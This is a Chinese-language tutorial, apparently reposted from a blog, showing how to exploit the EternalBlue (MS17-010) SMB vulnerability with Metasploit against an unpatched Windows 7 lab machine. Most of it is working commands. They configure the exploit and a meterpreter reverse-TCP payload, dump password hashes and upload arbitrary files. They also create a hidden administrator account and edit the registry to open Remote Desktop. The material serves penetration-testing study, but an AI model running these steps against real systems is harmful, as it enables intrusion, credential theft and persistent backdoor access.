MSF利用永恆之藍漏洞


1、實驗環境

攻擊機:Kali或安裝metasploit的機器

靶機:未打永恆之藍補丁和防火牆已經關閉的win7

2、漏洞利用

2.1 進入msf控制台,在終端上輸入

1 shell

2.2 查找利用模塊

1 search ms17_010

2.3 配置參數

1 use  exploit/windows/smb/ms17_010_eternalblue
2 set rhosts 172.17.89.2
3 set  payload   windows/x64/meterpreter/reverse_tcp

2.4 查看配置是否完成

1 show options 

2.5 進行攻擊

1 run

2.6 成功利用。在這里可以獲取目標主機的信息,sysinfo、ipconfig、shell、hashdump等,meterpreter是metasploit框架中的一個擴展模塊,作為溢出成功后的攻擊載荷使用,攻擊載荷在溢出攻擊成功以后給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個meterpreter shell的鏈接。

1 screenshot    #截圖
2 upload xxx.exe c:\xxx.exe    #可以上傳任意文件

 2.7 get shell。新增一個用戶並設置為管理員

1 net user test 123456 /add
2 net localgroup Administrators test /add

 

2.7。開啟遠程桌面。使用剛才的test用戶直接遠程桌面到靶機。

1 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM